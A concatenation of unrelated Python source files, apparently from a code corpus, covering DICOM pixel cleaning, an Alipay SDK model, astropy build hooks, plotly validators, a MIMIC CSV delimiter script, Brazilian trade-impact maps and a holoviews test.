plt.title(title, fontdict=self.font)
if show is True:
plt.show()
return plt
def _get_clean_name(self, output_folder, extension="dcm"):
"""
Get path to a cleaned output file.
Return a full path to an output file, with custom folder and
extension. If the output folder isn't yet created, make it.
Parameters
==========
output_folder: the output folder to create, will be created if doesn't
exist.
extension: the extension of the file to create a name for, should
not start with "."
"""
if output_folder is None:
output_folder = self.output_folder
if not os.path.exists(output_folder):
bot.debug("Creating output folder %s" % output_folder)
os.makedirs(output_folder)
basename = re.sub("[.]dicom|[.]dcm", "", os.path.basename(self.dicom_file))
return "%s/cleaned-%s.%s" % (output_folder, basename, extension)
def save_png(self, output_folder=None, image_type="cleaned", title=None):
"""
Save an original or cleaned dicom as png to disk.
Default image_format is "cleaned" and can be set to "original." If the
image was already clean (not flagged) the cleaned image is just a
copy of original. If a 4d image is provided, we save the dimension
specified (or if not provided, a randomly chosen dimension).
"""
if hasattr(self, image_type):
png_file = self._get_clean_name(output_folder, "png")
plt = self.get_figure(image_type=image_type, title=title)
plt.savefig(png_file)
plt.close()
return png_file
else:
bot.warning("use detect() --> clean() before saving is possible.")
def save_animation(self, output_folder=None, image_type="cleaned", title=None):
"""
Save an original or cleaned animation of a dicom.
If there are not enough frames, then save_png should be used instead.
"""
if hasattr(self, image_type):
from matplotlib import animation
animation.rcParams["animation.writer"] = "ffmpeg"
image = getattr(self, image_type)
# If we have rgb, choose a channel
if len(image.shape) == 4:
channel = random.choice(range(image.shape[3]))
bot.warning("Selecting channel %s for rendering" % channel)
image = image[:, :, :, channel]
# Now we expect 3D, we can animate one dimension over time
if len(image.shape) == 3:
movie_file = self._get_clean_name(output_folder, "mp4")
# First set up the figure, the axis, and the plot element we want to animate
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(10, 6))
plt.close()
                ax.set_xlim(0, image.shape[1])
                ax.set_ylim(0, image.shape[2])
ax.set_xticks([])
ax.set_yticks([])
img = ax.imshow(image[0, :, :].T, cmap="gray")
img.set_interpolation("nearest")
# The animation function should take an index i
def animate(i):
img.set_data(image[i, :, :].T)
sys.stdout.flush()
return (img,)
bot.info("Generating animation...")
anim = animation.FuncAnimation(
fig, animate, frames=image.shape[0], interval=50, blit=True
)
anim.save(
movie_file,
writer="ffmpeg",
fps=10,
dpi=100,
metadata={"title": title or "deid-animation"},
)
return movie_file
else:
                bot.warning(
                    "save_animation() requires 3D or 4D data. Use save_png instead."
                )
else:
bot.warning("use detect() --> clean() before saving is possible.")
def save_dicom(self, output_folder=None, image_type="cleaned"):
"""
Save a cleaned dicom to disk.
We expose an option to save an original (change image_type to "original"
to be consistent, although this is not incredibly useful given it would
duplicate the original data.
"""
# Having clean also means has dicom image
if hasattr(self, image_type):
dicom_name = self._get_clean_name(output_folder)
dicom = read_file(self.dicom_file, force=True)
# If going from compressed, change TransferSyntax
if dicom.file_meta.TransferSyntaxUID.is_compressed is True:
dicom.decompress()
dicom.PixelData = self.cleaned.tobytes()
dicom.save_as(dicom_name)
return dicom_name
else:
bot.warning("use detect() --> clean() before saving is possible.")
def clean_pixel_data(
dicom_file,
results: dict,
fix_interpretation: bool = True,
pixel_data_attribute: str = "PixelData",
):
"""
Clean a dicom file.
take a dicom image and a list of pixel coordinates, and return
a cleaned file (if output file is specified) or simply plot
the cleaned result (if no file is specified)
Parameters
==========
dicom_file: (str or FileDataset instance) Dicom file to clean
results: Result of the .has_burned_pixels() method
fix_interpretation: fix the photometric interpretation if found off
pixel_data_attribute: PixelData attribute name in the dicom file
"""
cleaned = None
# Load in dicom file, and image data
dicom = utils.load_dicom(dicom_file)
pixel_data = getattr(dicom, pixel_data_attribute)
# Get expected and actual length of the pixel data (bytes, expected does not include trailing null byte)
expected_length = get_expected_length(dicom)
actual_length = len(pixel_data)
    full_length = expected_length / 2 * 3  # RGB data is 3/2 the size of YBR_FULL_422 data
    full_length += 1 if full_length % 2 else 0  # trailing padding byte if length is odd
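    # Worked example (illustrative numbers): one 100x100 YBR_FULL_422 frame
    # stores 2 bytes per pixel, so expected_length = 100 * 100 * 2 = 20000
    # bytes, while the same frame as RGB needs full_length = 20000 / 2 * 3
    # = 30000 bytes (3 bytes per pixel); no padding byte is added since
    # 30000 is already even.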
    # If we have YBR_FULL_422, must be RGB to obtain pixel data
if (
not dicom.file_meta.TransferSyntaxUID.is_compressed
and dicom.PhotometricInterpretation == "YBR_FULL_422"
and fix_interpretation
and actual_length >= full_length
):
bot.warning(
"Updating dicom.PhotometricInterpretation to RGB, set fix_interpretation to False to skip."
)
photometric_original = dicom.PhotometricInterpretation
dicom.PhotometricInterpretation = "RGB"
original = dicom.pixel_array
dicom.PhotometricInterpretation = photometric_original
else:
original = dicom.pixel_array
    # Compile coordinates from results into a list of (mask_value, coordinate) tuples:
    # mask value 1 == keep (from keepcoordinates), 0 == clean (from coordinates).
coordinates = []
for item in results["results"]:
# We iterate through coordinates in order specified in file
for coordinate_set in item.get("coordinates", []):
# Each is a list with [value, coordinate]
mask_value, new_coordinates = coordinate_set
if not isinstance(new_coordinates, list):
new_coordinates = [new_coordinates]
for new_coordinate in new_coordinates:
# Case 1: an "all" indicates applying to entire image
if new_coordinate.lower() == "all":
# 2D - Greyscale Image - Shape = (X, Y) OR 3D - RGB Image - Shape = (X, Y, Channel)
if len(original.shape) == 2 or (
len(original.shape) == 3 and dicom.SamplesPerPixel == 3
):
# minr, minc, maxr, maxc = [0, 0, Y, X]
new_coordinate = [
0,
0,
original.shape[1],
original.shape[0],
]
# 4D - RGB Cine Clip - Shape = (frames, X, Y, channel) OR 3D - Greyscale Cine Clip - Shape = (frames, X, Y)
if len(original.shape) == 4 or (
len(original.shape) == 3 and dicom.SamplesPerPixel == 1
):
new_coordinate = [
0,
0,
original.shape[2],
original.shape[1],
]
else:
new_coordinate = [int(x) for x in new_coordinate.split(",")]
coordinates.append(
(mask_value, new_coordinate)
) # [(1, [1,2,3,4]),...(0, [1,2,3,4])]
# Instead of writing directly to data, create a mask of 1s (start keeping all)
# For 4D RGB Cine - (frames, X, Y, channel) or 3D Greyscale Cine - (frames, X, Y)
if len(original.shape) == 4 or (
len(original.shape) == 3 and dicom.SamplesPerPixel == 1
):
mask = numpy.ones(original.shape[1:3], dtype=numpy.uint8)
# For 2D Greyscale image (X, Y) or 3D RGB Image (X, Y channel)
else:
mask = numpy.ones(original.shape[0:2], dtype=numpy.uint8)
# Here we apply the coordinates to the mask, 1==keep, 0==clean
for coordinate_value, coordinate in coordinates:
minr, minc, maxr, maxc = coordinate
# Update the mask: values set to 0 to be black
mask[minc:maxc, minr:maxr] = coordinate_value
# Now apply finished mask to the data
# RGB cine clip
if len(original.shape) == 4:
# np.tile does the copying and stacking of masks into the channel dim to produce 3D masks
# transposition to convert tile output (channel, X, Y) into (X, Y, channel)
# see: https://github.com/nquach/anonymize/blob/master/anonymize.py#L154
channel3mask = numpy.transpose(numpy.tile(mask, (3, 1, 1)), (1, 2, 0))
# use numpy.tile to copy and stack the 3D masks into 4D array to apply to 4D pixel data
# tile converts (X, Y, channels) -> (frames, X, Y, channels), presumed ordering for 4D pixel data
final_mask = numpy.tile(channel3mask, (original.shape[0], 1, 1, 1))
# apply final 4D mask to 4D pixel data
cleaned = final_mask * original
# RGB image or Greyscale cine clip
elif len(original.shape) == 3:
# This condition is ambiguous. If the image shape is 3, we may have a single frame RGB image: size (X, Y, channel)
# or a multiframe greyscale image: size (frames, X, Y). Interrogate the SamplesPerPixel field.
if dicom.SamplesPerPixel == 3:
# RGB Image
# Convert (X, Y) -> (X, Y, channel)
final_mask = numpy.transpose(
numpy.tile(mask, (original.shape[2], 1, 1)), (1, 2, 0)
)
else:
# Greyscale cine clip
# Convert (X, Y) -> (frames, X, Y)
final_mask = numpy.tile(mask, (original.shape[0], 1, 1))
# apply final 3D mask to 3D pixel data
cleaned = final_mask * original
# greyscale image: no need to stack into the channel dim since it doesn't exist
elif len(original.shape) == 2:
cleaned = mask * original
else:
bot.warning(
"Pixel array dimension %s is not recognized." % (str(original.shape))
)
return cleaned
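# A standalone sketch (not deid code) of the numpy tiling used above: one 2D
# keep/clean mask is broadcast across channels and frames, so a single
# rectangle definition scrubs every frame of an RGB cine clip. Shapes are
# illustrative.
#
#   import numpy as np
#   mask = np.ones((4, 6), dtype=np.uint8)
#   mask[1:3, 2:5] = 0                                            # region to scrub
#   rgb_mask = np.transpose(np.tile(mask, (3, 1, 1)), (1, 2, 0))  # (4, 6, 3)
#   cine_mask = np.tile(rgb_mask, (10, 1, 1, 1))                  # (10, 4, 6, 3)
#   assert cine_mask.shape == (10, 4, 6, 3)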
|
b7dfc743668027b8d87dab6a8d77b83f0c4e9ae3
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/domain/AlipayOpenIotmbsIsvhotelCreateModel.py
|
0789f8baf1ab18f75422dc1ba350cfd9fff12900
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 4,345
|
py
|
AlipayOpenIotmbsIsvhotelCreateModel.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayOpenIotmbsIsvhotelCreateModel(object):
def __init__(self):
self._appid = None
self._area_code = None
self._project_addr = None
self._project_flag = None
self._project_id = None
self._project_name = None
self._shop_id = None
self._solution = None
@property
def appid(self):
return self._appid
@appid.setter
def appid(self, value):
self._appid = value
@property
def area_code(self):
return self._area_code
@area_code.setter
def area_code(self, value):
self._area_code = value
@property
def project_addr(self):
return self._project_addr
@project_addr.setter
def project_addr(self, value):
self._project_addr = value
@property
def project_flag(self):
return self._project_flag
@project_flag.setter
def project_flag(self, value):
self._project_flag = value
@property
def project_id(self):
return self._project_id
@project_id.setter
def project_id(self, value):
self._project_id = value
@property
def project_name(self):
return self._project_name
@project_name.setter
def project_name(self, value):
self._project_name = value
@property
def shop_id(self):
return self._shop_id
@shop_id.setter
def shop_id(self, value):
self._shop_id = value
@property
def solution(self):
return self._solution
@solution.setter
def solution(self, value):
self._solution = value
def to_alipay_dict(self):
params = dict()
if self.appid:
if hasattr(self.appid, 'to_alipay_dict'):
params['appid'] = self.appid.to_alipay_dict()
else:
params['appid'] = self.appid
if self.area_code:
if hasattr(self.area_code, 'to_alipay_dict'):
params['area_code'] = self.area_code.to_alipay_dict()
else:
params['area_code'] = self.area_code
if self.project_addr:
if hasattr(self.project_addr, 'to_alipay_dict'):
params['project_addr'] = self.project_addr.to_alipay_dict()
else:
params['project_addr'] = self.project_addr
if self.project_flag:
if hasattr(self.project_flag, 'to_alipay_dict'):
params['project_flag'] = self.project_flag.to_alipay_dict()
else:
params['project_flag'] = self.project_flag
if self.project_id:
if hasattr(self.project_id, 'to_alipay_dict'):
params['project_id'] = self.project_id.to_alipay_dict()
else:
params['project_id'] = self.project_id
if self.project_name:
if hasattr(self.project_name, 'to_alipay_dict'):
params['project_name'] = self.project_name.to_alipay_dict()
else:
params['project_name'] = self.project_name
if self.shop_id:
if hasattr(self.shop_id, 'to_alipay_dict'):
params['shop_id'] = self.shop_id.to_alipay_dict()
else:
params['shop_id'] = self.shop_id
if self.solution:
if hasattr(self.solution, 'to_alipay_dict'):
params['solution'] = self.solution.to_alipay_dict()
else:
params['solution'] = self.solution
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayOpenIotmbsIsvhotelCreateModel()
if 'appid' in d:
o.appid = d['appid']
if 'area_code' in d:
o.area_code = d['area_code']
if 'project_addr' in d:
o.project_addr = d['project_addr']
if 'project_flag' in d:
o.project_flag = d['project_flag']
if 'project_id' in d:
o.project_id = d['project_id']
if 'project_name' in d:
o.project_name = d['project_name']
if 'shop_id' in d:
o.shop_id = d['shop_id']
if 'solution' in d:
o.solution = d['solution']
return o
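# A minimal usage sketch (illustrative values only): round-tripping the model
# through its dict form, which is how these SDK models serialize payloads.
#
#   model = AlipayOpenIotmbsIsvhotelCreateModel()
#   model.appid = '2021000000000000'
#   model.project_name = 'demo-hotel'
#   payload = model.to_alipay_dict()
#   # -> {'appid': '2021000000000000', 'project_name': 'demo-hotel'}
#   restored = AlipayOpenIotmbsIsvhotelCreateModel.from_alipay_dict(payload)
#   assert restored.project_name == 'demo-hotel'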
|
f2c7a1dfacde55afe52a3d868cf4abab13dec3b1
|
93713f46f16f1e29b725f263da164fed24ebf8a8
|
/Library/lib/python3.7/site-packages/astropy-4.0-py3.7-macosx-10.9-x86_64.egg/astropy/modeling/setup_package.py
|
138fde4d44bc46936c24d14cd26c81d55cab1641
|
[
"BSD-3-Clause"
] |
permissive
|
holzschu/Carnets
|
b83d15136d25db640cea023abb5c280b26a9620e
|
1ad7ec05fb1e3676ac879585296c513c3ee50ef9
|
refs/heads/master
| 2023-02-20T12:05:14.980685
| 2023-02-13T15:59:23
| 2023-02-13T15:59:23
| 167,671,526
| 541
| 36
|
BSD-3-Clause
| 2022-11-29T03:08:22
| 2019-01-26T09:26:46
|
Python
|
UTF-8
|
Python
| false
| false
| 4,319
|
py
|
setup_package.py
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import os
from os.path import join
from distutils.core import Extension
from distutils import log
from astropy_helpers import setup_helpers, utils
from astropy_helpers.version_helpers import get_pkg_version_module
wcs_setup_package = utils.import_file(join('astropy', 'wcs', 'setup_package.py'))
MODELING_ROOT = os.path.relpath(os.path.dirname(__file__))
MODELING_SRC = join(MODELING_ROOT, 'src')
SRC_FILES = [join(MODELING_SRC, 'projections.c.templ'),
__file__]
GEN_FILES = [join(MODELING_SRC, 'projections.c')]
# This defines the set of projection functions that we want to wrap.
# The key is the projection name, and the value is the number of
# parameters.
# (These are in the order that they appear in the WCS coordinate
# systems paper.)
projections = {
'azp': 2,
'szp': 3,
'tan': 0,
'stg': 0,
'sin': 2,
'arc': 0,
'zea': 0,
'air': 1,
'cyp': 2,
'cea': 1,
'mer': 0,
'sfl': 0,
'par': 0,
'mol': 0,
'ait': 0,
'cop': 2,
'coe': 2,
'cod': 2,
'coo': 2,
'bon': 1,
'pco': 0,
'tsc': 0,
'csc': 0,
'qsc': 0,
'hpx': 2,
'xph': 0,
}
def pre_build_py_hook(cmd_obj):
preprocess_source()
def pre_build_ext_hook(cmd_obj):
preprocess_source()
def pre_sdist_hook(cmd_obj):
preprocess_source()
def preprocess_source():
    # TODO: Move this to setup_helpers

    # Generating the projection wrappers should only be done if needed. This
    # also ensures that it is not done for any release tarball since those
    # will already include the generated projections.c.
if all(os.path.exists(filename) for filename in GEN_FILES):
# Determine modification times
src_mtime = max(os.path.getmtime(filename) for filename in SRC_FILES)
gen_mtime = min(os.path.getmtime(filename) for filename in GEN_FILES)
version = get_pkg_version_module('astropy')
if gen_mtime > src_mtime:
# If generated source is recent enough, don't update
return
elif version.release:
# or, if we're on a release, issue a warning, but go ahead and use
# the wrappers anyway
log.warn('WARNING: The autogenerated wrappers in '
'astropy.modeling._projections seem to be older '
'than the source templates used to create '
'them. Because this is a release version we will '
'use them anyway, but this might be a sign of '
'some sort of version mismatch or other '
'tampering. Or it might just mean you moved '
'some files around or otherwise accidentally '
'changed timestamps.')
return
# otherwise rebuild the autogenerated files
# If jinja2 isn't present, then print a warning and use existing files
try:
import jinja2 # pylint: disable=W0611
except ImportError:
log.warn("WARNING: jinja2 could not be imported, so the existing "
"modeling _projections.c file will be used")
return
from jinja2 import Environment, FileSystemLoader
# Prepare the jinja2 templating environment
env = Environment(loader=FileSystemLoader(MODELING_SRC))
c_in = env.get_template('projections.c.templ')
c_out = c_in.render(projections=projections)
with open(join(MODELING_SRC, 'projections.c'), 'w') as fd:
fd.write(c_out)
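# Illustrative sketch of the templating step above (the real
# projections.c.templ is more involved; this only shows the render mechanics
# with made-up output):
#
#   from jinja2 import Template
#   t = Template("{% for name, nparams in projections.items() %}"
#                "prj_{{ name }} takes {{ nparams }} params\n"
#                "{% endfor %}")
#   print(t.render(projections={'tan': 0, 'azp': 2}))
#   # -> prj_tan takes 0 params
#   #    prj_azp takes 2 params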
def get_extensions():
wcslib_files = [ # List of wcslib files to compile
'prj.c',
'wcserr.c',
'wcsprintf.c',
'wcsutil.c'
]
wcslib_config_paths = [
join(MODELING_SRC, 'wcsconfig.h')
]
cfg = setup_helpers.DistutilsExtensionArgs()
wcs_setup_package.get_wcslib_cfg(cfg, wcslib_files, wcslib_config_paths)
cfg['include_dirs'].append(MODELING_SRC)
astropy_files = [ # List of astropy.modeling files to compile
'projections.c'
]
cfg['sources'].extend(join(MODELING_SRC, x) for x in astropy_files)
cfg['sources'] = [str(x) for x in cfg['sources']]
cfg = dict((str(key), val) for key, val in cfg.items())
return [Extension('astropy.modeling._projections', **cfg)]
|
aa64ccb3b2100a5def39431e551b52a785debc47
|
acf7457d3a799cb9bff12686d2d616688bcd4b5b
|
/packages/python/plotly/plotly/validators/layout/uniformtext/__init__.py
|
8ddff597fe33c9ee20b9950c1e118dcad606507d
|
[
"MIT"
] |
permissive
|
plotly/plotly.py
|
f4f61639f08160f16195efc95b5901dc5a937346
|
975a704074f01c078e0fdfa32bdf17130bf89e69
|
refs/heads/master
| 2023-09-06T06:15:08.340035
| 2023-08-24T12:28:14
| 2023-08-24T12:28:14
| 14,579,099
| 14,751
| 2,989
|
MIT
| 2023-09-08T19:55:32
| 2013-11-21T05:53:08
|
Python
|
UTF-8
|
Python
| false
| false
| 371
|
py
|
__init__.py
|
import sys
from typing import TYPE_CHECKING
if sys.version_info < (3, 7) or TYPE_CHECKING:
from ._mode import ModeValidator
from ._minsize import MinsizeValidator
else:
from _plotly_utils.importers import relative_import
__all__, __getattr__, __dir__ = relative_import(
__name__, [], ["._mode.ModeValidator", "._minsize.MinsizeValidator"]
)
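# Context (hedged): on Python >= 3.7, relative_import is assumed to install a
# PEP 562 module-level __getattr__ so each validator is imported on first
# access instead of at package import time. A minimal sketch of that pattern:
#
#   import importlib
#
#   def __getattr__(name):  # invoked only when `name` is not found normally
#       if name == "ModeValidator":
#           return importlib.import_module("._mode", __name__).ModeValidator
#       raise AttributeError(name)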
|
bc41d823eb354d47f1bb159f126f372ebff0df75
|
eaaaf5afe1bf933b2c00c84d862082995e6051ae
|
/mimic-iii/buildmimic/oracle/add_oracle_rowdelimiter.py
|
39f85294e065786ad2bbdf6bf0db3fa43a7ed6a8
|
[
"MIT"
] |
permissive
|
MIT-LCP/mimic-code
|
bca9846a9c0843289db677a2af00b43841950b48
|
78f7b6e5a8886f52066b0505c451597590bea862
|
refs/heads/main
| 2023-08-21T23:20:38.270790
| 2023-07-19T11:43:01
| 2023-07-19T11:43:01
| 41,767,943
| 2,208
| 1,579
|
MIT
| 2023-09-12T17:14:04
| 2015-09-01T23:03:51
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 3,539
|
py
|
add_oracle_rowdelimiter.py
|
from __future__ import print_function
import sys
import getopt
import os.path
import csv
# This function takes a CSV file and appends a string to the end of each row
# This facilitates using the CSV with programs which can't handle newlines in fields
# For example, Oracle's SQLLDR requires a unique string at the end of each row to indicate the row delimiter.
# FUNCTION ASSUMPTIONS:
# 1) file is in proper CSV format, where "proper" is defined as:
# comma delimited
# if a string contains a comma, it is double quoted
# if a string contains a newline, it is double quoted
# double quotes occurring within a string are escaped by another double quote
# 2) file does *not* have a header row
def main(argv):
"""
Run `Remove newlines` from a CSV file.
Arguments
----------
-h: print help
-i: str
Absolute path to a valid CSV file.
-d: str
Delimiter (','). For delimiters with special characters, quote the delimiter in apostrophes.
"""
# parse input arguments
fn_in=''
delimiter=''
fn_sql=''
output_type = 'oracle'
newline_char = '\n'
oracle_newrow = '><><?~`;;`'
    # 'oracle' output type: rows keep their embedded newlines (quoted); a
    # unique row delimiter string is appended so the loader can split records.
try:
        opts, args = getopt.getopt(argv,"hi:d:r:",["ifile=","delimiter=","row-delimiter="])
except getopt.GetoptError:
print('remove_newlines.py -i <input_file> -d <delimiter> -r <row_delimiter>')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print('remove_newlines.py -i <input_file> -d <delimiter> -r <row_delimiter>')
sys.exit()
elif opt in ("-i", "--ifile"):
fn_in = arg
elif opt in ("-d", "--delimiter"):
delimiter = arg
elif opt in ("-r", "--row-delimiter"):
oracle_newrow = arg
# input argument checking
if os.path.isfile(fn_in) == 1:
print('Using input file {}'.format(fn_in))
else:
print('Cannot find input file {}'.format(fn_in))
sys.exit(2)
    fn_out = os.path.splitext(fn_in)[0] + '_output.csv'
print('\n'+'~'*40)
print('Input filename = {}'.format(fn_in))
print('Delimiter = {}'.format(delimiter))
print('New row character(s) = {}'.format(oracle_newrow))
print('Output filename = {}'.format(fn_out))
print('Please note all output fields will be double quoted.')
print('~'*40+'\n')
#raw_input('Press any key to continue.')
with open(fn_in , 'rb') as input_file:
reader = csv.reader(input_file, delimiter=',',
doublequote=True,
quoting=csv.QUOTE_MINIMAL)
        # QUOTE_NONNUMERIC doesn't work on the reader because it tries to convert dates to floats
# consequently, all fields are output quoted
# not a big deal for oracle, which has optionally enclosed by double quotes parameter
with open(fn_out,'wb') as fout:
out = csv.writer(fout, doublequote=True, quoting=csv.QUOTE_NONNUMERIC,
lineterminator=oracle_newrow + '\r\n')
for row in reader:
out.writerow(row)
if reader.line_num % 100000 == 0:
                    print('Finished {0:.1f} million lines.'.format(reader.line_num / 1000000.0))
# Summarise output
print('\n'+'~'*40)
    print('Processing complete\n')
print('Number of rows processed: {}'.format(reader.line_num))
print('New file created: {}'.format(fout.name))
print('~'*40)
if __name__ == "__main__":
main(sys.argv[1:])
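# Example invocation (illustrative filename; the default row delimiter is the
# oracle_newrow string defined above, so -r only overrides it):
#
#   python add_oracle_rowdelimiter.py -i admissions.csv -d ',' -r '|$|'
#
# This writes admissions_output.csv with '|$|\r\n' terminating every row,
# which SQLLDR can then treat as a unique record delimiter.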
|
69d327c83e0b8bcd593eb4b27fd7b8bcf866e479
|
3aad16c9b4a2f903e74d0c3fadd033f2f8f3db30
|
/trademap/mapa_final.py
|
15c16c87b8f4cd37330d7f76bd788842f75f4b06
|
[] |
no_license
|
omercadopopular/cgoes
|
bae7617a6714ccb60f6854067d44e21e4459d6d4
|
55a010da4a47ba8fc9c28d04f85261676faa169b
|
refs/heads/master
| 2022-12-27T22:14:16.665593
| 2022-12-16T01:46:33
| 2022-12-16T01:46:33
| 58,074,789
| 143
| 59
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,307
|
py
|
mapa_final.py
|
# -*- coding: utf-8 -*-
"""
PROJECT: "A Strategy for Anticipating the Regional and Sectoral Impacts
of Brazilian Trade Liberalization on Employment and the Retraining of the Affected Population"

PROJECT TEAM: Carlos Góes (SAE), Eduardo Leoni (SAE),
Luís Montes (SAE) and Alexandre Messa (Economic Unit of CAMEX).

AUTHOR OF THIS CODE: Carlos Góes, SAE/Presidency of the Republic

DATE: 24/07/2017
"""
import pandas as pd
import matplotlib.pyplot as plt
import geopandas as gpd
import os
#####################################
# 1. Retrieve Databases
#####################################
data_mun = "K:\\Notas Técnicas\\Abertura\\data\\Econometria\\results\\modelresult_mun.json"
shp_mun = "K:/Notas Técnicas/Abertura/data/mapas/BR/BRMUE250GC_SIR.shp"
data_micro = "K:\\Notas Técnicas\\Abertura\\data\\Econometria\\results\\modelresult_micro.json"
shp_micro= "K:/Notas Técnicas/Abertura/data/mapas/BR/BRMIE250GC_SIR.shp"
datartr_micro="k:/Notas Técnicas/Abertura/data/Econometria/data/rtr.csv"
# Import data
modelresult_mun = pd.read_json(path_or_buf=data_mun)
modelresult_micro = pd.read_json(path_or_buf=data_micro)
os.chdir(os.path.dirname(datartr_micro))
rtr_micro = pd.read_csv(os.path.basename(datartr_micro))
# Import shapefiles
sf_mun = gpd.read_file(shp_mun)
sf_micro = gpd.read_file(shp_micro)
#####################################
# 2. Adjust and merge databases
#####################################
# Adjust municipality or microregion codes
sf_mun['CD_GEOCMU'] = [int(item[:-1]) for item in sf_mun['CD_GEOCMU']]
sf_micro['CD_GEOCMI'] = [int(item) for item in sf_micro['CD_GEOCMI']]
rtr_micro['rtr'] = [item * 100 for item in rtr_micro['rtr']]
# Merge databases
sf_mun = sf_mun.set_index("CD_GEOCMU").join(modelresult_mun.set_index("municipio"), how="left").reset_index(drop=False)
modelresult_micro = pd.merge(rtr_micro, modelresult_micro, left_on="microrregiao", right_on="microrregiao")
sf_micro = sf_micro.set_index("CD_GEOCMI").join(modelresult_micro.set_index("microrregiao"), how="left").reset_index(drop=False, col_fill="CD_GEOCMI")
simplifytolerance = 0.05
sf_micro['geometry'] = sf_micro['geometry'].simplify(simplifytolerance)
#####################################
# 3. Plot Maps
#####################################
## Changes
groups = ["pop_change_mun_final","pop_change_mun_final_pos","pop_change_mun_final_neg"]
for group in groups:
fig, axes = plt.subplots(figsize=(10, 10))
mymap = sf_micro.plot(ax=axes,
column=group,
linewidth=0.05,
cmap="seismic_r",
vmin = -2,
vmax = 2)
plt.axis('off')
plt.tight_layout()
cax = fig.add_axes([0.9, 0.1, 0.03, 0.8])
sm = plt.cm.ScalarMappable(cmap="seismic_r", norm=plt.Normalize(vmin = -2, vmax = 2))
sm._A = []
fig.colorbar(sm, cax=cax)
plt.show()
fig.savefig("K:/Notas Técnicas/Abertura/data/mapas/pdf/mapa_micro" + group + ".pdf")
fig.savefig("K:/Notas Técnicas/Abertura/data/mapas/svg/mapa_micro" + group + ".svg")
fig.savefig("K:/Notas Técnicas/Abertura/data/mapas/png/mapa_micro" + group + ".png", dpi=600, transparent=False)
## Tariff
fig, axes = plt.subplots(figsize=(10, 10))
mymap = sf_micro.plot(ax=axes,
column="rtr",
linewidth=0.05,
cmap="afmhot_r",
vmin = 0,
vmax = 20)
plt.axis('off')
plt.tight_layout()
cax = fig.add_axes([0.9, 0.1, 0.03, 0.8])
sm = plt.cm.ScalarMappable(cmap="afmhot_r", norm=plt.Normalize(vmin = 0, vmax = 20))
sm._A = []
fig.colorbar(sm, cax=cax)
plt.show()
fig.savefig("K:/Notas Técnicas/Abertura/data/mapas/pdf/mapa_micro_tarifa.pdf")
fig.savefig("K:/Notas Técnicas/Abertura/data/mapas/svg/mapa_micro_tarifa.svg")
fig.savefig("K:/Notas Técnicas/Abertura/data/mapas/png/mapa_micro_tarifa.png", dpi=600, transparent=False)
#####################################
# 4. Loop for State Maps
#####################################
estados = sf_micro['UFSigla'].unique()
for estado in estados:
sf_mini = sf_micro[ sf_micro['UFSigla'] == estado ]
fig, axes = plt.subplots(figsize=(10, 10))
mymap = sf_mini.plot(ax=axes,
column="pop_change_mun_final",
linewidth=0.02,
cmap="seismic_r",
vmin = -2,
vmax = 2)
plt.axis('off')
    plt.title(str(estado) + ': Expected Change in Employment 10 years after trade liberalization, by microregion')
plt.tight_layout()
cax = fig.add_axes([0.9, 0.1, 0.03, 0.8])
sm = plt.cm.ScalarMappable(cmap="seismic_r", norm=plt.Normalize(vmin = -3, vmax = 3))
sm._A = []
fig.colorbar(sm, cax=cax)
plt.show()
fig.savefig("K:/Notas Técnicas/Abertura/data/mapas/pdf/mapa_" + estado + ".pdf")
fig.savefig("K:/Notas Técnicas/Abertura/data/mapas/svg/mapa_" + estado + ".svg")
fig.savefig("K:/Notas Técnicas/Abertura/data/mapas//png//mapa_" + estado + ".png", dpi=600, transparent=False)
|
fc5e089fbfa95fe271459d6b37724eaf6ecfc9ab
|
4658aa41017b2e6da830f1e879774e4a7296c314
|
/holoviews/tests/plotting/plotly/test_path3d.py
|
af96c07f5c3379b25610fa05bc0789faf1fc2ea1
|
[
"BSD-3-Clause"
] |
permissive
|
holoviz/holoviews
|
3f133e572933c94cedad7bae6fb6d071152842fc
|
e3dee5443dad84b507734c0a3d2bba8ec44f5653
|
refs/heads/main
| 2023-09-03T05:08:42.682432
| 2023-08-28T20:40:36
| 2023-08-28T20:40:36
| 19,542,768
| 1,223
| 223
|
BSD-3-Clause
| 2023-09-14T18:15:53
| 2014-05-07T16:59:22
|
Python
|
UTF-8
|
Python
| false
| false
| 2,507
|
py
|
test_path3d.py
|
import numpy as np
from holoviews.element import Path3D
from .test_plot import TestPlotlyPlot
class TestPath3DPlot(TestPlotlyPlot):
def test_path3D_state(self):
path3D = Path3D([(0, 1, 0), (1, 2, 1), (2, 3, 2)])
state = self._get_plot_state(path3D)
self.assertEqual(state['data'][0]['x'], np.array([0, 1, 2]))
self.assertEqual(state['data'][0]['y'], np.array([1, 2, 3]))
self.assertEqual(state['data'][0]['mode'], 'lines')
self.assertEqual(state['data'][0]['type'], 'scatter3d')
self.assertEqual(state['layout']['scene']['xaxis']['range'], [0, 2])
self.assertEqual(state['layout']['scene']['yaxis']['range'], [1, 3])
self.assertEqual(state['layout']['scene']['zaxis']['range'], [0, 2])
def test_path3D_multi(self):
path3D = Path3D([[(0, 1, 0), (1, 2, 1), (2, 3, 2)], [(-1, 1, 3), (-2, 2, 4), (-3, 3, 5)]])
state = self._get_plot_state(path3D)
self.assertEqual(state['data'][0]['x'], np.array([0, 1, 2]))
self.assertEqual(state['data'][0]['y'], np.array([1, 2, 3]))
self.assertEqual(state['data'][0]['z'], np.array([0, 1, 2]))
self.assertEqual(state['data'][0]['mode'], 'lines')
self.assertEqual(state['data'][0]['type'], 'scatter3d')
self.assertEqual(state['data'][1]['x'], np.array([-1, -2, -3]))
self.assertEqual(state['data'][1]['y'], np.array([1, 2, 3]))
self.assertEqual(state['data'][1]['z'], np.array([3, 4, 5]))
